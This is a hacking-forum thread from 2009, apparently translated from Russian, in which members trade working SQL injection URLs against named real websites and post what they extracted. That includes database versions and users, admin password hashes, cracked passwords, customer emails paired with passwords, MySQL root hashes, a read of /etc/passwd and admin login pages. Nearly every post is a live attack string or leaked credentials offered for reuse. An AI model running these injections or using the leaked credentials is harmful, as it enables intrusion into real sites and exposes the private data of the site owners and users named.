SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Gedj

    Code:
    http://www.inforealt.ru/content/?id=-1+union+select+1,concat(login,0x3a,passwd),3,4,5,6,7,8,9,10+from+sitexpert_users--
     
  2. z00MAN

    Code:
    http://www.exclusivewebsolutions.co.uk/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(version(),0x3a,database(),0x3a,user())--
    user(): web225-a-joo-133@localhost
    version(): 5.0.67-community
    database(): web225-a-joo-133

    admin:5146ece4d7ee8bea2996a94aa5b4d72f:ltQAvqnDA0XCLWk0N2kI0Ns2qW9SWEry

    PR = 2

    Code:
    http://www.seeleman.nl/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(version(),0x3a,database(),0x3a,user())--
    user(): [email protected]
    version(): 5.0.32-Debian_7etch6
    database(): md106698db52069

    admin:c30cc14f6a417d111ebac62c3fb38d66:M1Cw74qU76QWf9nem8O85DTQcFLU2kTz
     
    #7442 z00MAN, 16 Jan 2009
    Last edited: 16 Jan 2009
  3. vakula

    A little shop

    Code:
    http://www.colortek-shop.ru/instr_full.php?pub_id=-3%20UNION%20SELECT%201,concat_ws(0x3a,user(),version(),database()),3
    version:: 5.0.32-Debian_7etch1-log
    user::[email protected]
    database:: z40650_1

    Code:
    http://www.newslook.ru/index.php?id=999999%20UNION%20SELECT%201,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10
    version::5.0.67
    user::newslook@localhost
    database::newslook
     
    #7443 vakula, 16 Jan 2009
    Last edited: 16 Jan 2009
  4. spherics

    Ultimate Collection of quality software!!!

    http://www.sharewareriver.com/product.php?id=3318908098+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user(),version(),database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--


    Database Version: 5.0.45-log
    Database name: a0020843
    User name: [email protected]


    We pull the users out with LIMIT; there are over 25 thousand of them there


    http://www.sharewareriver.com/product.php?id=3318908098+UNION+SELECT+1,2,3,4,5,6,7,CONCAT(0x7873716C696E6A626567696E,(SELECT+CONCAT(id,0x7873716C696E6A64656C,title,0x7873716C696E6A64656C,e_mail,0x7873716C696E6A64656C,PASSWORD)+FROM+a0020843.authors+LIMIT+1,1),0x7873716C696E6A656E64),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--


    [1]:4:#1 ACE:[email protected]:X2nJ9tBh
    [2]:5:MeanFox:[email protected]:fwpfwpfw
    [3]:6:10-Strike Software:[email protected]:nRHP8Psg


    The rest is boring.... :)


    http://www.sharewareriver.com/product.php?id=3318908098+UNION+SELECT+1,2,3,4,5,6,7,CONCAT(0x7873716C696E6A626567696E,LOAD_FILE(0x2F6574632F706173737764),0x7873716C696E6A656E64),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--


    Reading /etc/passwd

     
    #7444 spherics, 16 Jan 2009
    Last edited: 16 Jan 2009
    1 person likes this.
  5. z00MAN

    gooody.at
    Code:
    http://www.gooody.at/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(version(),0x3a,database(),0x3a,user())
    user(): db1070925-gooody
    version(): 5.0.32-Debian_7etch8-log
    database(): dbu1070925@localhost
    PR=3

    admin:4a03c8d6910be8db872e6dc4f70ee4ed:kouCfOZj8PYKj690MgWP7BY7ljmthHtr


    "Гостиный дом"
    Code:
    http://gostidom.com/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(user(),0x3a,version(),0x3a,database())
    user(): _bdgosti
    version(): 5.0.45
    database(): myroot@localhost

    admin:7c2adff331c4807dd7d2d9dc0cd8bc10:08ayLZq2giqNZsBQDTf9xS2BXTGDmxqC
     
    #7445 z00MAN, 16 Jan 2009
    Last edited: 16 Jan 2009
  6. spherics

    http://www.pre-trib.org/article-view.php?id=3809809832+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8--


    User:web_user@localhost
    Version:5.0.45-Debian_1ubuntu3.4-log
    Database:pre_trib_new

    /home/pre_trib/releases/20090114_220536/article-view.php

    Getting root

    http://www.pre-trib.org/article-view.php?id=3809809832+union+select+1,2,concat_ws(0x3a,user,password),4,5,6,7,8+from+mysql.user--


    root:*85BCC49962DFC4BE4580D8D14155504478DC9461
     
  7. hackmen

    http://www.ndsu.edu/wwwdev/ndsu_webcal/index.php?cid=-187%20union%20select%201,concat_ws(0x3a,lname,fname,email),3+from+administrators/*

    https://www.lebow.drexel.edu/Newsroom/Newsletters/index.php?cid=-5+union+select+1,2,3,version(),5,6,7,8,9,10,11--

    http://www.pemaquid.com/content-manager/story.php?cID=-86+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13--

    http://www.latinoboxing.com/story.php?cid=-10382+union+select+1,2,3,4,version(),6--
     
  8. wildshaman

    http://www.ex-elec.com/files/firm.php?id=-1+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+users+limit+0,1--

    The hash decrypts to: bigbear

    Logging in with the login admin and the password bigbear doesn't work =(
    If anyone manages it, drop me a line =)
     
  9. wildshaman

    https://www.bioinquire.com/product-profile.php?ID=-1+union+select+1,2,concat_ws(0x3a,email,userpass),4,5,6,7,8,9,10,11,12+FROM+Tigeradmin_Users+limit+0,1+--

    [email protected]:ta21XwWv/Yggk

    What is the password encrypted with? I can't figure it out.
     
  10. sharoff

    If anyone gets any further with these, PM me at least a table name... a couple of them have phpbb, but either we don't know the prefixes or the database is a different one..
     
    #7450 sharoff, 17 Jan 2009
    Last edited by a moderator: 17 Jan 2009
  11. dr.Pilulkin

    http://www.overclockers.co.uk/showproduct.php?prodid=CD-092-LO&groupid=701&catid=10&subcat=-314+union+select+user(),version(),database()/*

    http://www.sitcom.co.uk/news/news.php?story=-000456+union+select+1,concat_ws(char(58),user(),version(),database()),3,4,5,6,7,8,9,10,11,12/*
    sitcom_work@localhost
    4.1.22-standard-log
    sitcom_BSG

    http://www.sitcom.co.uk/news/news.php?story=-000456+union+select+1,concat_ws(char(58),email,password),3,4,5,6,7,8,9,10,11,12+from+users/*
    [email protected]:5ddadf914707c31330fa85b78ac3e9e4:testing8
    http://www.sitcom.co.uk/login/login.php

    http://www.sff.co.uk/display_article.php?articleid=-160+union+select+1,binary(user()),3,4,binary(version()),6/*
    [email protected]
    4.1.15-standard
    SFF_prod
     
    #7451 dr.Pilulkin, 17 Jan 2009
    Last edited by a moderator: 17 Jan 2009
  12. spherics

    Version:4.1.22-standard
    User:tw711co_man@localhost
    Database:tw711co_movies

    Database Version: 5.0.67-log
    Database name: walkerco_booksDB
    User name: [email protected]

    The output is in the picture -)

    Database Version: 5.0.67-community
    Database name: coolwall_fondos
    User name: coolwall_coolwal@localhost


    What we need, 1100 of them

    [1]:Ricardo Hempel:rickhs:cosmic7:44:[email protected]:0iqzljc1719eC6FKIkpX2
    [2]:artek:masterartek:donkeykong:228:[email protected]:0wJAb4z1rZ3745pB1wMkF
    [3]:Juan Carlos:Juank:kipipa:44:[email protected]:0323DsZ4NmPRK8122PUdr
    etc....




    BOOKSTORE

    Database Version: 5.0.27-standard
    Database name: Clients_Bookpassage
    User name: Bookpassage@localhost

    Do this one yourselves -)

    Vineyard Gazette Online

    User:gazette_write@localhost
    Version:5.0.51a-3ubuntu5.1
    Database:gazette_online
     
    1 person likes this.
  13. _evgeniy_

    Code:
    http://ua.salvationchurch.com.ua/news?id=-243+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5
    
    salvchurch_ua@beta
    4.1.22-log
    salvchurch_ua
    Code:
    http://sdl.com.ua/index.php?page=news_item&id=-78+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5
    
    sdl@beta
    4.1.22-log
    sdl

    Code:
    http://www.selteq.com/tablename/sq_news_items/id/-247+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
    
    rssi_selteq@beta
    4.1.22-log
    rssi_selteq

    Code:
    http://razno.ru/out/?id=1796+union+select+concat_ws(0x3a,version(),database(),user())
    
    5.0.67-log
    u10534
    [email protected]

    Code:
    http://safarov.ru/06.php?act=news_by_id&news_id=-15208+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8--
    
    iran@localhost
    4.1.22-log
    site_safarov

    Code:
    http://hcdynamo.com/?player&id=-1051+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version(),database()),10,11,12
    
    hcdynamo@localhost
    4.1.22-log
    hcdynamodb
     
    1 person likes this.
  14. spherics

    Database Version: 4.0.24_Debian-10sarge1-log
    Database name: fractal
    User name: fractal@localhost


    Database Version: 5.0.67-log
    Database name: mailarchive
    User name: [email protected]


    User:tv3ouser@localhost
    Version:4.1.20
    Database:tv3o
     
  15. FNS

    It's DES(Unix)
     
  16. ILYAtirtir

    www.boosthead.com
    [email protected]:4.1.16-standard-log

    Access to mysql.user; I didn't guess the tables, but I doubt there's anything interesting there.


    www.pitatel.ru
    root@localhost:4.0.22-standard:mysql
    root::localhost:N
    ::localhost:N
    ::main.hs.orc.ru:N
    root::main.hs.orc.ru:Y



    http://www.twn.tuv.com
    administrator@localhost:tuv:4.0.15-nt-log
    hmm... moving on...
    root with no password, a pity it's localhost, look further...
    root::%
    and this is already very interesting), looking further via LIMIT



    it happens.... :)
     
    #7456 ILYAtirtir, 19 Jan 2009
    Last edited: 19 Jan 2009
  17. Cennarios

    http://www.sex-shop-online.net/ndex.php?blockyid=catalog&cat=-1+union+select+concat_ws(0x3a3a,username,password)+from+pref_users--

    http://www.sex-shop-online.net/admin/

    login:admin
    pass:tyeugdc


    Administering a sex-toy shop...
     
  18. Военный

    http://www.usadba.ru/city/flat/213123/? or 1=1-- - runs without a hitch
    http://www.usadba.ru/city/flat/213123/? union select 1--
    it says
    I never did manage to work out the number of columns.
    The version is above 5, since information_schema is present
    Anyway, if anyone can work out the number of columns, please post back.
     
  19. z00MAN

    CDKWeb
    Code:
    https://www.cdkweb.com/inthenewsdetails.php?id=-19+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7--
    user(): cdkuser@localhost
    version(): 4.1.22
    database(): cdk
    PR: 6
    couldn't guess the tables((

    Fortune Software
    Code:
    http://cfortune.kics.bc.ca/templates/chili.pepper/index.php?id=-19+union+select+1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6--
    user(): cfortune@localhost
    version(): 5.0.51a-3ubuntu5.4
    database(): cfortune
    TIC: 10
    PR: 4


    lots of tables:
    c_reg_users
    user
    dating_users


    from c_reg_users:
    admin:bed128365216c019988915ed3add75fb
    auctiontal:ba69897483886f0d2b0afb6345b76c0c

    from user:
    cfortune:jamocha
    gina:gina
    evemiranda:eve1
     
    #7459 z00MAN, 19 Jan 2009
    Last edited: 20 Jan 2009
    1 person likes this.
  20. 0nep@t0p

    http://forge.mysql.com
    Code:
    http://forge.mysql.com/tools/search.php?sortby=(added_on*if(ascii(substring((select+version()+from+information_schema.tables+limit+1,1),1,1))=53,1,-1))&sortorder=desc&page=9
    Injection after ORDER BY; it takes a very long time to work through, even with scripts

    P.S. history repeats itself =)

    http://forum.antichat.ru/showpost.php?p=520975&postcount=1
     
    4 people like this.